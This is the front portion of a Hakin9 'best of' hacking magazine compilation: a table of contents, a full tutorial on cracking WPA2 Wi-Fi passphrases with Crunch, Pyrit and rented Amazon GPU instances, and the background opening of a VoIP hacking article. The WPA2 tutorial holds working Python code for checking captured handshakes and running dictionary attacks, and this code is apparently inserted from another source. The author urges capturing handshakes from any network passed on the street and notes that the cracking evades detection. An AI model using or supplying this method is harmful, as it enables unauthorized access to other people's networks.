
Free Articles from Hakin9
"In some cases Nipper Studio has virtually removed the need for a manual audit." Cisco Systems Inc.
Titania's award-winning Nipper Studio configuration auditing tool is helping security consultants and end-user organizations worldwide improve their network security. Its reports are more detailed than those typically produced by scanners, enabling you to maintain a higher level of vulnerability analysis in the intervals between penetration tests.
Now used in over 45 countries, Nipper Studio provides a thorough, fast and cost-effective way to securely audit over 100 different types of network device. The NSA, FBI, DoD and U.S. Treasury already use it, so why not try it for free at www.titania.com
Update: now with STIG auditing
Editor in Chief: Ewa Duranc
ewa.duranc@hakin9.org
Managing Editor: Krzysztof Samborski
krzysztof.samborski@hakin9.org
Editorial Advisory Board: Gaereth Watters, John Webb
Special Thanks to the Beta testers and Proofreaders who helped
us with this issue. Without their assistance there would not be a
Hakin9 Magazine.
Publisher: Paweł Marciniak
CEO: Ewa Dudzic
ewa.dudzic.@hakin9.org
Marketing Director: Krzysztof Samborski
krzysztof.samborski@hakin9.org
Art. Director: Ireneusz Pogroszewski
ireneusz.pogroszewski@hakin9.org
DTP: Ireneusz Pogroszewski
Publisher: Hakin9 Media sp. z o.o. SK
02-676 Warszawa, ul. Postępu 17D
NIP 95123253396
www.hakin9.org/en
Whilst every effort has been made to ensure the highest qual-
ity of the magazine, the editors make no warranty, expressed
or implied, concerning the results of the contents usage. All
trademarks presented in the magazine were used for informa-
tive purposes only.
All rights to trademarks presented in the magazine are reserved
by the companies which own them.
DISCLAIMER!
The techniques described in our magazine may be used in
private, local networks only. The editors hold no respon-
sibility for the misuse of the techniques presented or any
data loss.
www.uat.edu > 877.UAT.GEEK
[ ITS IN YOUR DNA ]
[ GEEKED AT BIRTH ]
You can talk the talk.
Can you walk the walk?
LEARN:
Advancing Computer Science
Artificial Life Programming
Digital Media
Digital Video
Enterprise Software Development
Game Art and Animation
Game Design
Game Programming
Human-Computer Interaction
Network Engineering
Network Security
Open Source Technologies
Robotics and Embedded Systems
Serious Game and Simulation
Strategic Technology Development
Technology Forensics
Technology Product Design
Technology Studies
Virtual Modeling and Design
Web and Social Media Technologies
Please see www.uat.edu/fastfacts for the latest information about
degree program performance, placement and costs.
THE BEST OF
Copyright 2014 Hakin9 Media Sp. z o.o. SK
Table of Contents
Using Amazon AMI for Cracking the WPA2 WiFi Hack .........................................................9
by Bruno Rodrigues
VoIP Hacking Techniques ...........................................................................................................16
by Mirko Raimondi
A Crash Course in Pentesting with Backtrack .........................................................................33
by Nick Hensley
Using Hydra To Crack The Door Open ....................................................................................53
by Nikolaos Mitropoulos
NMAP and Metasploit for MS-SQL Auditing ..........................................................................61
by Jose Ruiz
Nmap: a Hacker Tool for Security Professionals .................................................................76
by Justin Hutchens
How To Reverse Engineer .NET files ........................................................................................88
by Jaromir Horejsi
Digital Forensics on the Apple OSX Platform .........................................................................93
by David Lister
Passwords Cracking: Theory and Practice .............................................................................100
by Theodosis Mourouzis
How to Use OpenVAS (Vulnerability Assessment System)? ..................................................107
by Willie Pritchett
How Do I phish? Advanced Email Phishing Tactics ...............................................................117
by Brandon McCann
How to Brute-force Drupal6 Login Pages?..............................................................................124
by Kevin Simons
How to Conduct VPN Pivoting? ...............................................................................................135
by Ayman Hammoudeh
Cracking WPA/WPA2 Key Using Reaver ...............................................................140
by Badrish Dubey
How to use Socat and Wireshark for Practical SSL Protocol Reverse Engineering? ..........146
by Shane R. Spencer
How to Identify and Bypass Anti-reversing Techniques? ......................................................153
by Eoin Ward
Capturing WiFi traffic with Wireshark ...................................................................................165
by Steve Williams
Wireshark/LUA ..........................................................................................................................175
by Jörg Kalsbach
Tracing ContikiOs Based IoT communications over Cooja simulations
with Wireshark Using Wireshark with Cooja simulator ........................................................181
by Pedro Moreno-Sanchez and Rogelio Martinez-Perez
Digital Security and Risk Analysis Side Channel Attack
with Brain Leading to Data and ID Theft ...............................................................................190
by Massimiliano Sembiante
Raspberry Pi Hacking Loving your pi and hacking it too .................................................199
by Jeremiah Brott
Bluetooth Hacking Tools............................................................................................................220
by Dennis Browning
Create a Basic Web Application Scan Policy ...........................................................................227
by Johan Loos
Create a Basic Scan Policy in Nessus 5 ....................................................................................233
by Johan Loos
Cross-Site Scripting (XSS) ........................................................................................................238
by Badrish Dubey
Implementing Rsyslog to forward log messages on an IP network .........................................247
by Lara Sanz
Weak Wi-Fi Security, Evil Hotspots and Pentesting with Android .......................................253
by Dan Dieterle
Pentesting with BackTrack distribution ..................................................................................261
by Jan Hrach, Miroslav Ludvik, Michal Srnec
Use Metasploit in Backtrack 5 ..................................................................................................270
by Johan Loos
Using REMnux to analyze PE files ...........................................................................................280
by Glenn P. Edwards Jr
Recovering Passwords and Encrypted Data Remotely in Plain Text ....................................285
by Daniel Dieterle
Trojan-izing USB Sticks ............................................................................................................291
by Gerasimos Kassaras
Deceiving Networks Defenses with Nmap Camouflaged Scanning .......................................296
by Roberto Saia
Cross Site Request Forgery Session Riding ..........................................................................308
by Miroslav Ludvik and Michal Srnec
Data Logging with Syslog A Troubleshooting and Auditing Mechanism..............................315
by Abdy Martinez
Caffe Latte Attack ......................................................................................................................323
by David Jardin
Reverse Engineering C++, a case study with the Win32/Kelihos Malware Family .............330
by Benjamin Vanheuverzwijn, Pierre-Marc Bureau
Cyber Warfare Network Attacks ..............................................................................................339
by Daniel Dieterle
Understanding conditionals in shellcode .................................................................................346
by Craig Wright
Creating a Fake Wi-Fi Hotspot to Capture Connected Users Information..........................355
by Roberto Saia
Accurate Time Synchronization with NTP Hardening your Cisco IOS Device ...................367
by Abdy Martinez
DNS Cache Poisoning ................................................................................................................373
by Jesus Rivero
Beyond Automated Tools and Frameworks: the ShellCode Injection Process ....................381
by Craig Wright
Tabnapping Attack Hijacking Browser Tabs ..........................................................................389
by Abdy Martinez
Using the Social Engineering Toolkit to Test Network Security ............................................396
by Daniel Dieterle
Starting to Write Your Own Linux Shellcode .........................................................................404
by Craig Wright
How to Recover Passwords from a Memory Dump ................................................................411
by Daniel Dieterle
Tag: You're Infected! QR Codes as Attack Vectors ................................................................417
by Tim Klup
Dear Hakin9 Readers!
We are glad to present our first THE BEST OF HAKIN9 in 2014. This time we wanted to
sum up the last 3 years of our work and thus we prepared a special collection of 48 top Hakin9
articles. Inside you will find more than 400 pages of how-to and step-by-step tutorials
that will surely contribute to your development as a professional pentester, exploiter or ethical
hacker.
We hope that this pack will shed some light on the direction our publication took after it underwent
major changes such as switching to an electronic version (.pdf and .epub formats) and focusing mostly
on exploiting and hacking techniques and tools.
This compendium is also a fine introduction to even greater changes in our magazine as it shows
You, our Reader, the topics that are most burning and eagerly read by Hakin9's audience. We
decided to stress the need to meet your high expectations and, in the forthcoming publications,
supply You with recurring issues on topics such as Exploiting Software, Reverse Engineering,
Pentesting, Offensive Programming and Network Cracking.
We hope You find these changes proper and satisfactory. We strongly encourage all of You to send
us messages about your needs and expectations, as this publication is devoted to You and
would not exist without its Readers. Please remember that we are always open to Your ideas and it is
You who decide on the next topics of Hakin9.
Feel free to share your views and comment on our recent and future work by sending us a message
to en@hakin9.org with COMMENTS in the subject. We respond to all your inquiries.
We wish you a good read,
Krzysztof Samborski
and Hakin9 team
Using Amazon AMI for Cracking the
WPA2 WiFi Hack
by Bruno Rodrigues
Let me start by sharing a little bit of programmers' humour. Some programmers decided to amuse us
and inserted the following text, shown when something goes wrong with a YouTube request (500 Internal
Error): "Sorry, something went wrong. A team of highly trained monkeys has been dispatched to deal
with this situation."
Now you are probably asking: what does this have to do with Wi-Fi hacking? Are we hacking YouTube? No!
Is the solution to Wi-Fi hacking on YouTube? Probably! But this article is not about that. This article is
about how we can crack WPA2-protected Wi-Fi networks efficiently.
So where do the trained monkeys and Wi-Fi networks meet? First, YouTube is massive: a lot of code
and systems on distributed infrastructure. Second, it is highly unlikely that one error spotted by a user
will be noticed by any system administrator or programmer. Third, even if the error is relevant, YouTube
will not be sending anyone to check it physically.
What I am saying is that a global infrastructure such as YouTube looks at errors on a global performance
and security scale, and spins up resources as required, across multiple systems, to balance load.
Nobody looks at specific individual cases; instead, resources are used to solve global events that affect
global cloud systems.
Based on this, I decided to create a new approach to WPA2 cracking. As a security auditor, I keep writing
reports saying that Wi-Fi can potentially be a weak entry point and therefore needs extra caution in
network design. But how safe are we when using a Wi-Fi network with a WPA2 pre-shared key?
At this point it is important to note that WPA2 as such has not been broken. We are looking at a scenario
where poor Wi-Fi security practices are in place (a short, guessable pre-shared key); nevertheless, I believe
this describes most of the Wi-Fi deployments out there. Also, a protocol not being broken does not mean it
cannot be attacked. That is what I want to show you, using a new approach where resources are potentially
unlimited and cost effective.
So how can WPA2-PSK be attacked? We can brute-force the passphrase against a captured handshake from the
Wi-Fi network (for now, let's keep the concept general). This has proven time consuming and resource
intensive, and therefore not very effective. Let me show you why, by looking at what is available.
First option: create a word list and brute-force the handshake to death. If you read a little about these
attacks, most guides will tell you that the only way to pull off such a stunt is to do some reconnaissance
(the company's website, for example) and combine the words you find into a list that might get you lucky.
I don't believe in luck; hackers make their own luck. So let's see what happens when we try to create a
word list that covers every WPA2 key of 8 alphanumeric characters (upper and lower case, i.e. 62 possible
characters per position):
Figure 1. Crunch Word list creation
Whoa! There is no way this will fit on my external hard drives. Even if we found an external host for
these files, we would be talking about NSA-style costs that normal mortals cannot afford. I guess most
readers are thinking, "What the hell is this guy doing?" I agree, but stay until the end. This is just a
walk into the past so we can understand the future, and believe me, it is a bright future.
So a plain word list with Crunch is out of the question. But wait, why don't we pipe Crunch into Pyrit
anyway? Would that make a difference?
A few words about the command shown in the screenshot: we tell Crunch to generate all combinations of 8
characters from the character set we provide (it is simply easier to pick all the characters I know and
let it do the job), and pipe the results to Pyrit, which reads them from standard input (-i -) and runs
them against the .cap file for the test network (identified by its SSID).
As you can see, at around 2000 PMKs per second it would take years to brute-force, which makes this a not
very viable way to crack WPA2 networks. I found a page that explains the magnitude of time it would take:
http://www.lockdown.co.uk/?pg=combi. I know you are probably thinking that this is not how it is done, and
that you should go for CUDA-enabled Pyrit. You are right. For now I just want to show you that a normal
desktop or laptop won't cut it.
There is no efficient way to do it on a single machine. This is the part where I lay down my method. And
no, we won't be using CUDA at this stage, since we are not talking about the five trained monkeys yet
(and they hold hands together). So what is the method, and why are we using Pyrit?
The reason is simple: Pyrit has an excellent feature that lets you attack a capture using a pre-computed
database of PMKs. Why is that relevant? Because it checks them by the millions per second, and because it
lets us start building our own rainbow tables. In one word, it SCALES. Meaning we can potentially break a
WPA2 passphrase of any length, and I have always wanted to get my hands on this kind of solution.
So let's see how my poor laptop does when we first create the words and then import them into a database.
We are still going to stick with Crunch and Pyrit. Pyrit comes with a built-in database out of the box
that you can use. Still, I leave it to you to connect it to an external database that scales much better
than the one on my PC.
Based on what we did previously, we are going to do this in 3 steps:
Create the word list, using the same characters as before
Figure 2. First step
Import the word list into the Pyrit database; this time we give option -i a file name
Figure 3. Second step
Run the batch (pre-compute the PMKs for the target ESSID) and attack
Figure 4. Third step
As you can see, the process is quite fast once the batch has run. Still, the batch itself took about the
same time as the pipe approach, so it doesn't yet give me the flexibility and scalability I want as a
hacker. I want to be able to do it in a couple of hours at most, and to be able to increase the number of
characters in the combinations in the near future.
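The two halves of what the Pyrit workflow above does, written out in pure Python as an added example (this is not the author's code and not Pyrit's): the slow part is deriving the PMK with PBKDF2 (4096 rounds of HMAC-SHA1, salted with the ESSID), which depends only on the passphrase and the network name and is therefore what the batch pre-computes into the database; the cheap part is deriving the KCK from the PMK and checking the MIC of the captured EAPOL frame. The MAC addresses, nonces and EAPOL message 2 below are constructed test data, not a real capture.

```python
"""WPA2-PSK handshake check and dictionary attack (added example, not Pyrit's code)."""
import hashlib
import hmac
from dataclasses import dataclass


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    # IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    # This is the slow step and the only one that depends solely on (passphrase, ESSID),
    # which is why Pyrit can pre-compute it per ESSID and store it in a database.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    # 802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ...
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_kck(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PTK = PRF-384(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(N)||max(N)).
    # The KCK (first 16 bytes of the PTK) authenticates the EAPOL-Key frames.
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)[:16]


# EAPOL-Key layout: 4-byte EAPOL header, then 77 bytes of descriptor fields before the 16-byte MIC.
MIC_OFFSET = 81


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    # WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1-128 over the frame with the MIC zeroed.
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


@dataclass
class Handshake:
    ssid: str
    ap_mac: bytes
    sta_mac: bytes
    anonce: bytes
    snonce: bytes
    eapol_msg2: bytes  # message 2 of the 4-way handshake, MIC field filled in


def build_eapol_msg2(snonce: bytes) -> bytes:
    # Minimal EAPOL-Key message 2 (constructed; field order as in 802.11i).
    frame = bytes([0x02, 0x03]) + (95).to_bytes(2, "big")      # EAPOL version, type Key, body length
    frame += b"\x02" + b"\x01\x0a" + b"\x00\x00"                  # RSN descriptor, key info (v2, pairwise, MIC), key length
    frame += (1).to_bytes(8, "big")                              # replay counter
    frame += snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, key IV, RSC, key ID
    frame += b"\x00" * 16 + b"\x00\x00"                          # MIC (zero until computed), key data length
    return frame


def make_test_handshake(passphrase: str, ssid: str) -> Handshake:
    # Constructed "capture": the MIC is derived from the real passphrase so the frame is self-consistent.
    ap, sta = bytes.fromhex("0011223344ff"), bytes.fromhex("66778899aabb")  # assumed test MACs
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))                 # assumed test nonces
    frame = build_eapol_msg2(snonce)
    kck = derive_kck(derive_pmk(passphrase, ssid), ap, sta, anonce, snonce)
    frame = frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]
    return Handshake(ssid, ap, sta, anonce, snonce, frame)


def precompute_pmks(ssid: str, words) -> dict:
    # The "pyrit batch" step: one PBKDF2 per word, done once per ESSID and reusable for every
    # handshake captured on that network.
    return {w: derive_pmk(w, ssid) for w in words}


def crack(hs: Handshake, pmk_table: dict):
    # The cheap per-handshake step: one PRF and one HMAC per candidate, no PBKDF2.
    captured_mic = hs.eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for word, pmk in pmk_table.items():
        kck = derive_kck(pmk, hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)
        if hmac.compare_digest(eapol_mic(kck, hs.eapol_msg2), captured_mic):
            return word
    return None


if __name__ == "__main__":
    words = ["password", "letmein1", "Summer2014", "correcthorse", "hakin9!!"]
    table = precompute_pmks("TestNet", words)          # slow: 4096 PBKDF2 rounds per word
    print(crack(make_test_handshake("Summer2014", "TestNet"), table))
```

Run it once and time the two phases separately: almost all of the wall-clock time is in `precompute_pmks`, which is the figure the `pyrit benchmark` "PMKs per second" reports, while `crack` against a table is near-instant. That asymmetry is the whole argument for pre-loading PMK databases into VM templates: the expensive work is done before any handshake is captured.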
So the next logical step is to arrange for computing power. In reality that is what is lacking right now:
we need the batch process to be faster (we still need to deal with the amount of data generated by Crunch,
as seen at the beginning of this article, but we'll get there later). Should we go to Amazon right now and
buy a brand new PC with a powerful NVIDIA card? We could, but I'm not sure how that would be a scalable,
flexible solution.
On the topic of Amazon, and back to the five trained monkeys: how about a solution that scales, is flexible
and cost effective, and, like the trained monkeys, does the work on a scale that no one person actually
controls? It's time to bring out the big guns and get the Ferrari out. Or at least rent one.
I give you EC2 AMIs. A couple of months ago Amazon rolled out instance types dedicated to high-performance
processing, based on GPUs instead of CPUs (which get this job done better), at an hourly price we can
afford. I give you the G2 instances. And yes, now the trained monkeys are in control.
As you can see, for less than a dollar an hour we get a machine with all the power we need. I must say it
took me a while to find the login user name (ec2-user) for the AMI; Amazon, it is NOT CLEAR what the user
name is. Nevertheless, I got it running and updated, and you won't believe how fast it was: 22Mbs of
bandwidth and a lot of processing power.
Regarding Amazon AMIs, I could fill the whole article on this, since there is a lot to say. Nevertheless, it
is up to you to understand the different options and instance types available. Also remember that not all
instance types are available in every region, not that I think the region matters for the kind of cracking
we are doing. Most of the information I found online points to using Amazon's own AMIs. Again, it's up to you.
Figure 5. Amazon Linux AMI with NVIDIA GRID GPU Driver
The AMI we are using comes empty and, therefore, we need to install all the tools we require.
For the job to be done properly, we need Python 2.5, CUDA-enabled Pyrit and Crunch. Only then can we put
this baby to the test. For now, I'll assume that you, the reader, know how to do this or at least hold a
master's degree in Google search, where you can find all the information you need.
This article is not about installing Crunch and Pyrit, so I won't go deep into it. Let's just say that some
users out there have done us the favour of writing some interesting scripts that get Pyrit (and a few bonus
tools) up and running in seconds. That is the power of the AMI: huge bandwidth and computing power.
For performance's sake, I decided to run the Pyrit benchmark and the results are just awesome.
Things are looking good. We should now see how much faster we can crack our test network. First I'll pipe
Crunch into Pyrit, and then I'll use the built-in database to attack the .cap file.
Figure 6. Attacking the .cap file
We have finally reached the point where we need to reset our thinking. I'm telling you this because you,
reader/hacker, have by now seen that none of the methods used actually solves our problem. We can crack,
potentially, a WPA2 passphrase of any length, but it still takes too much time and therefore does not scale.
Until now, and you will find some documentation online about this, all the approaches point to using Crunch
to create a huge word list and Pyrit with its workload distributed to other AMIs. I didn't cover that,
because I still believe it won't get us there either.
About that reset and the five monkeys: let's see what the cloud gives us (and with "cloud" I hereby launch
the next quest: which other clouds were you able to run the same project on? Send me your feedback, I'm
anxious to know). It gives us flexibility by allowing us to run multiple AMIs or VMs worldwide. It allows
us to pay by the hour, so we can turn machines off and leave them off until we need them. And it allows us
to build a machine, leave it off at no charge, and create new VMs from it.
That last paragraph is of the utmost importance. Let's play a mental game and see how we can combine all
the tools described so far with the advantages mentioned above. Did you get there? Need 5 more minutes?
Let me help you structure your thoughts and define a new strategy for WPA2 cracking.
What if we could break the Crunch/Pyrit process into small pieces and still use the database feature that
lets us attack much faster? That would mean creating multiple VMs pre-loaded with Pyrit and a small part
of the word list/database each. By running multiple VMs in parallel we can crack the WPA2 key in a short
time, since each VM processes only part of the load; by the end, all the VMs together have processed all
the possible combinations. This method also lets us scale as far as we can go: we just add new VMs to ease
the load on the others, and at the hourly cost, believe me, we can grow and grow. On top of that, we can
use the power of templates, so we don't start from scratch every time we need to crack a Wi-Fi network.
The batch still needs to run, since the SSID changes (the PMKs depend on it), but the password list each
VM holds, and all the work of loading it, can be done before any attack.
The storage problem is also gone. Load and space we can scale, giving us the cost flexibility we need.
We just need to do our homework before loading the .cap file, set the SSID and run the batch. The password
list will already be pre-loaded on the template from which we create the VM.
Technically speaking, let's walk through it step by step so you can see the wonders of what we are doing.
This time, as I already mentioned, I decided to go with a different AMI so you can see the different
options available. Also be careful which instance type you choose, as the options differ in price and
performance. I went with a GPU-ready AMI from Amazon and the g2.2xlarge instance type: more expensive, but
definitely worth it.
Figure 7. GPU instances
Step one
Get the right tools for the job. Again, I won't waste time here since I believe the hackers who have kept
reading until now understand the power of Google and will be able to do this in a heartbeat. Remember that
this won't be your production machine but a template we are creating, so we don't have to repeat part of
the process every time we want to crack a Wi-Fi network. It is also what lets us build our five-monkeys
model, where resources are spun up on demand rather than physical.
Step two
Create a small fraction of the word list. This is where it got tricky. Nevertheless, after going through
the Crunch manual, we figured out a way to break the word list into small pieces: Crunch can split its
output into files of a maximum size, naming each file after the first and last word it contains, which
allows us to resume where it stopped and continue from there. If you look at the -c option, you'll see I
chose a huge value so that Pyrit would tell me which maximum value I should use.
Figure 8. Pyrit warning
In this example we create all combinations of upper- and lower-case letters and digits, from 1 to 8
characters long. As you can see, Crunch is responsible for naming the files. We then change the command to
resume where Crunch left off and start creating a new set of files. You just need to keep an eye on the
number and size of files created and stop before running out of space. Then, when we want to continue, we
launch a new VM and start from where we left off, simply overlapping the last file created.
Figure 9. Crunch
Pay attention to the last sequence in the file name: xxxxx-yyyyy.txt. You'll need to set the minimum word
length on the crunch command to match the length of yyyyy.
Step three
Import all the files into the Pyrit database. Alternatively, generate the word files on your local
computer and upload them to the VM: you have the bandwidth, so why use the VM's storage for anything other
than the database? This way you won't waste space on files you no longer need. Upload to one VM, load the
words directly into Pyrit, and distribute manually to the other VMs. You can schedule this and leave it
running overnight, since you probably have cheaper storage attached to your own computer.
Step four
Save the VM as a template. This step is easy and straightforward. Go to your EC2 management console,
choose the instance you want (in this case every instance created is pre-loaded with word lists), give it
a name (my advice is something like nameoffirstfile-nameoflastfile, so you know which range this VM is
supposed to process) and choose "Create Image".
Step five
Launch all the instances, set the ESSID in Pyrit and run the batch.
Step six
Upload the .cap file and attack it with the Pyrit database. I just want to add an off-topic note at this
step: I'm using an Android application on my phone called Linux Deploy, which makes it easy to install the
ARM version of Kali Linux. You can then, while walking down the street, capture a perfect handshake .cap
file from any Wi-Fi network you encounter, scp the file to the Amazon cloud and let the monkeys do the work
for you. After all, they are trained.
You'll notice that all the steps might take some time, like the word creation, VM creation and import into
the Pyrit database, but in fact you do it only once, save it as a template and create new VMs from the ones
previously created. It will take some time, but you are building a kind of rainbow table for Wi-Fi, so
expect some work before the attack and the cracking.
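The keyspace arithmetic behind Steps two and four, as an added example (not the author's script, and not part of Crunch or Pyrit). It reproduces the word order Crunch uses by default (leftmost character most significant, rightmost changing fastest) so that each VM template can be handed an explicit first and last word, in the same spirit as the xxxxx-yyyyy.txt file names, and it puts numbers on the two problems the article ran into: how big the plain word list is on disk, and how long one machine at the quoted 2000 PMK/s would take. The 62-character set and the 2000 PMK/s figure come from the article; everything else is computed.

```python
"""Keyspace sizing and partitioning for distributed WPA2 cracking (added example)."""

# The article's character set: lower case, upper case and digits (62 symbols).
CHARSET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"


def keyspace_size(charset: str, min_len: int, max_len: int) -> int:
    """Number of candidate words of length min_len..max_len over charset."""
    return sum(len(charset) ** n for n in range(min_len, max_len + 1))


def wordlist_bytes(charset: str, min_len: int, max_len: int) -> int:
    """Size of the plain word list on disk: each word plus its newline."""
    return sum(len(charset) ** n * (n + 1) for n in range(min_len, max_len + 1))


def word_at(charset: str, length: int, index: int) -> str:
    """The index-th word (0-based) of a given length, in Crunch's default order."""
    base = len(charset)
    if not 0 <= index < base ** length:
        raise ValueError("index outside keyspace")
    chars = []
    for _ in range(length):
        index, digit = divmod(index, base)
        chars.append(charset[digit])
    return "".join(reversed(chars))


def index_of(charset: str, word: str) -> int:
    """Inverse of word_at: position of a word within its length class."""
    index = 0
    for ch in word:
        index = index * len(charset) + charset.index(ch)
    return index


def split_keyspace(charset: str, length: int, workers: int) -> list:
    """Split every word of one length into `workers` contiguous, disjoint ranges.

    Returns (first_word, last_word, count) per worker. The ranges cover the whole
    length class exactly once, so no VM repeats another VM's work.
    """
    total = len(charset) ** length
    per_worker = -(-total // workers)  # ceiling division
    ranges = []
    for w in range(workers):
        start = w * per_worker
        if start >= total:
            break
        end = min(start + per_worker, total) - 1
        ranges.append((word_at(charset, length, start), word_at(charset, length, end), end - start + 1))
    return ranges


def crack_time_seconds(candidates: int, pmks_per_second: float, workers: int = 1) -> float:
    """Worst-case wall-clock time to derive every candidate's PMK across `workers` machines."""
    return candidates / (pmks_per_second * workers)


if __name__ == "__main__":
    n8 = keyspace_size(CHARSET, 8, 8)
    print(f"8-char keyspace: {n8:,} words, {wordlist_bytes(CHARSET, 8, 8) / 1e15:.2f} PB as a plain list")
    print(f"one laptop at 2000 PMK/s: {crack_time_seconds(n8, 2000) / (365 * 86400):,.0f} years")
    for first, last, count in split_keyspace(CHARSET, 8, 5):
        print(f"{first}-{last}.txt  ({count:,} words)")
```

The first-word/last-word pairs are what you would name the templates after (Step four) and pass to Crunch as a start string when regenerating a range on a fresh VM. The `crack_time_seconds` figure is what makes the point of the article: the per-machine rate only matters once it is multiplied by a number of workers you can grow at will.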
As you can see, none of the tools and servers mentioned is new to us hackers. It's a matter of using some
of the available tools and redefining the strategy we use to attack whatever we can attack, making it more
efficient and faster. My challenge here was to show how the mental process can be built, and I hope that
readers might think about other attacks or hacks that, although not new, with a different strategy might
get you in where it wasn't possible before.
New tools, new clouds and more processing power will keep emerging, and we hackers have to start thinking
about how we can leverage a good technology and give it the power it needs to achieve what we want. Also,
the strategy defined here will probably go undetected: the capture and the cracking happen at different
moments, and the cracking itself won't raise any flags anywhere. Not even at Amazon.
I just hope that if you security guys at Amazon are reading this, you understand that we won't be using
this for bad things. Keep in mind that this technique should only be used for authorized testing or
educational purposes. Always get permission, or use your own network, before you start cracking.
About the Author
Bruno Rodrigues is an enthusiastic network engineer with the drive and determination needed to resolve
complex networking issues. He has effective organizational skills, excellent working knowledge of
networking technologies and a commitment to keeping up to date with the latest developments. He is
experienced in providing motivation, guidance and up-to-date networking consultancy to both colleagues
and clients.
Cigital SecureAssist
Find and Fix Security Defects During Development
Plug-in for Eclipse and Visual Studio identifies common security vulnerabilities and provides remediation guidance.
Contextual: guidance and examples specific to the language
Customizable: incorporate organizational standards into guidance
Expert validated: based on Cigital's experience in thousands of code reviews
Actionable: code examples explain the right way and place to fix defects
Free 30-day trial: www.cigital.com/hakin9
VoIP Hacking Techniques
by Mirko Raimondi
The Public Switched Telephone Network (PSTN) is the global system of interconnected analog and digital
telephone networks of various sizes that gives users the ability to carry voice conversations with each
other. The most basic analog network service, called POTS (Plain Old Telephone Service), uses a pair of
twisted copper wires to connect a residential phone to a central office, from which the residential
customer can dial out into the PSTN.
What you will learn...
basics of VoIP network protocols
how to attack a VoIP network
how to defend a VoIP network
What you should know...
basics of networking
Initially, the telephone network was a simple one-to-one line connecting phones in one room with another.
As the telephone business grew, Private Branch eXchanges (PBX) were designed and deployed in office
settings to provide a growing number of telephone lines and to connect internal callers (over trunk lines)
to destination callers, either directly or through the PSTN. When the PSTN became digital, a method called
Time Division Multiplexing (TDM) was introduced. TDM transmits and receives independent signals over a
common signal path by means of synchronized switches at each end of the transmission line, so that each
signal appears on the line only for a fraction of the time, in an alternating pattern.
Voice over Internet Protocol (VoIP) is a newer technology that allows phone conversations to be carried
over computer networks: it transforms analog and digital audio signals into data packets. VoIP usually
refers to multimedia communication applications that are transported over a packet-switched network
(such as the Internet) instead of the PSTN. VoIP has seen rapid adoption over the past few years; many
users choose VoIP to leave traditional telephone providers behind and pay cheaper bills, and for
companies VoIP is an easy way to communicate between their branches and with their teleworking
employees.
An example of a simple VoIP network can be seen in Figure 1, where VoIP works as a private telephone
network that is transparent to the PSTN. Software phones (also called softphones), IP phones and analog
phones (which must use a VoIP adapter) connect to a PBX, where the internal telephones are connected to
public lines or to other VoIP systems on the Internet. Using a VoIP media gateway, a VoIP phone can call a
legacy phone on the PSTN and vice versa, since the media gateway translates the IP packets into TDM.
VoIP services are widely used, but their security threats are analyzed only from specific angles or not
considered at all. This article analyzes the most common VoIP threats in order to identify existing
weaknesses and suggests available countermeasures. For each threat, an example attack is reported and
explained since, in the author's opinion, knowing the tools that attackers could use is important.
In this way the current state of VoIP is analyzed from the attacker's point of view to discover the most
vulnerable parts of the system. The results of this article can be used by system administrators, network
engineers and penetration testers to examine their own VoIP systems.
The author of this paper disclaims all responsibility for any inappropriate use of the information reported
here and suggests trying these attack techniques only in controlled environments, such as test plants,
and with the prior authorization of the owner.
THE BEST OF
17
VoIP Fundamental Protocols
VoIP telephony mainly uses two protocols in order to set up a call and to transport the audio/video signal.
They are described in the following subsections.
Real-Time Protocol (RTP)
The Real-time Transport Protocol (RTP) is a standardized packet format used on IP networks to deliver
audio/video signals. RTP was developed by the Audio/Video Transport working group of the Internet
Engineering Task Force (IETF) standards organization; it was initially described in IETF RFC 1889 and then
superseded by IETF RFC 3550. It was designed for end-to-end, real-time transfer of streamed data, it is
regarded as the primary standard for audio/video transport in IP networks, and it is used together with an
associated profile and payload format.
Figure 1. Classic VoIP network scenario
RTP is used in conjunction with the Real-Time Control Protocol (RTCP), which is used to monitor transmission
statistics and Quality of Service and aids the synchronization of multiple streams. While RTP is originated and
received on even port numbers, the associated RTCP packets use the next higher odd port number.
The protocol provides facilities for jitter compensation (jitter is rather common on a Packet-Switched
Network, since communication passes through network routers), detection of out-of-sequence arrival of data,
and data transfer to multiple destinations through IP multicast.
Real-time applications require timely delivery of information and can usually tolerate some packet loss
better than an excessive delay. Hence the Transmission Control Protocol (TCP) is normally not used by RTP,
since TCP favors reliability over timeliness; RTP systems are instead usually built on the
User Datagram Protocol (UDP).
The audio sampling rate is typically either 8000 Hz or 16000 Hz, and the rate at which RTP packets are
transmitted is determined by the audio codec by means of its packetization period. Whether those packets
actually arrive at a fixed rate at the receiving endpoint depends on the network performance: RTP packets
might be dropped by routers, might arrive at the receiving endpoint out of sequence, or could even be
duplicated while they transit the network.
Hence receiving endpoints are designed with the assumption that RTP packets will not arrive at the precise
rate at which they were transmitted. For this reason an endpoint incorporates a jitter buffer, whose parameters
adjust the characteristics of time buffering in an attempt to produce the highest Quality of Service during
playback. The jitter buffer uses the RTP header information to accomplish its functions.
